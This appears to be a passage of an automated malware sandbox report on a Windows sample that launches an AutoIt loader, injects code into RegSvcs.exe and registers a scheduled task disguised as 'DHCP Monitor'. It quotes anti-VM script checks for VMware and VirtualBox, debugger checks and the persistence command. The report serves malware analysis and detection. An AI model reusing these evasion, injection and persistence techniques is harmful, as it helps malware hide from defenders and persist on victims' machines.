Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008AA2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		8_2_008AA2EA
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		8_2_008643FF

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM autoit script

Show sources

Source: Yara match

File source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR

Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 4456	Thread sleep count: 9866 > 30	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 4456	Thread sleep time: -98660s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 4456	Thread sleep count: 118 > 30	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Thread sleep count: Count: 9866 delay: -10

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 9866	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 2827	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 6549	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 497	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 1377	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Theny8c)_
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: fmkkelc.omp.0.dr	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exeZv
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: VMwareService.exe
Source: fmkkelc.omp.0.dr	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: fmkkelc.omp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: VMwareUser.exeE97637D6
Source: fmkkelc.omp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then3P%_
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exe#u
Source: RegSvcs.exe, 0000000E.00000002.778557217.0000000001B5C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: fmkkelc.omp.0.dr	Binary or memory string: If ProcessExists("VBoxTray.exe") Then

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_001AD353 VirtualQuery,GetSystemInfo,

0_2_001AD353

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_0019A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0019A2DF
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_001AAFB9
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001B9FD3 FindFirstFileExA,	0_2_001B9FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0086399B GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0086399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	8_2_0087BCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00882408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00882408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0087280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008A8877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	8_2_008A8877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0088CAE7 FindFirstFileW,FindNextFileW,FindClose,	8_2_0088CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00861A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00861A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0088DE7C FindFirstFileW,FindClose,	8_2_0088DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0087BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0087BF17

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0083EE30 LoadLibraryA,GetProcAddress,

8_2_0083EE30

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_001B6AF3 mov eax, dword ptr fs:[00000030h]

0_2_001B6AF3

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_001AE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_001AE4F5

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_001BACA1 GetProcessHeap,

0_2_001BACA1

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0088A35D BlockInput,

8_2_0088A35D

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AE643 SetUnhandledExceptionFilter,	0_2_001AE643
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001AE4F5
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001AE7FB
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001B7BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001B7BE1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0084F170 SetUnhandledExceptionFilter,	8_2_0084F170
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0084A128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0084A128
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00847CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00847CCD

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11FE000			Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_008643FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

8_2_008643FF

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_00866C61 LogonUserW,

8_2_00866C61

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0083D7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

8_2_0083D7A0

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_00863321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

8_2_00863321

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0087602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

8_2_0087602A

Source: mmuiqlcvwo.pif, 00000008.00000002.778707309.00000000021A0000.00000002.00020000.sdmp, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then$_
Source: mmuiqlcvwo.pif, 00000008.00000002.780044954.00000000040F0000.00000004.00000001.sdmp, RegSvcs.exe, 0000000E.00000002.781821258.0000000003A5C000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 0000000E.00000002.781821258.0000000003A5C000.00000004.00000001.sdmp	Binary or memory string: Program ManagerHajlp
Source: mmuiqlcvwo.pif.0.dr	Binary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mmuiqlcvwo.pif, 00000008.00000002.778707309.00000000021A0000.00000002.00020000.sdmp, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RegSvcs.exe, 0000000E.00000002.784945197.000000000706B000.00000004.00000010.sdmp	Binary or memory string: Program Managerp
Source: RegSvcs.exe, 0000000E.00000002.781821258.0000000003A5C000.00000004.00000001.sdmp	Binary or memory string: Program ManagerPZ
Source: fmkkelc.omp.0.dr	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: mmuiqlcvwo.pif, 00000008.00000002.778707309.00000000021A0000.00000002.00020000.sdmp, RegSvcs.exe, 0000000E.00000002.780278757.0000000002160000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: RegSvcs.exe, 0000000E.00000002.785203082.000000000796D000.00000004.00000010.sdmp	Binary or memory string: Program Managerpb
Source: mmuiqlcvwo.pif, 00000008.00000000.287969306.00000000008B2000.00000002.00020000.sdmp	Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: RegSvcs.exe, 0000000E.00000002.784850073.0000000006D6C000.00000004.00000010.sdmp	Binary or memory string: $mProgram Manager

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_001A9D99

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_001AE34B cpuid

0_2_001AE34B

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

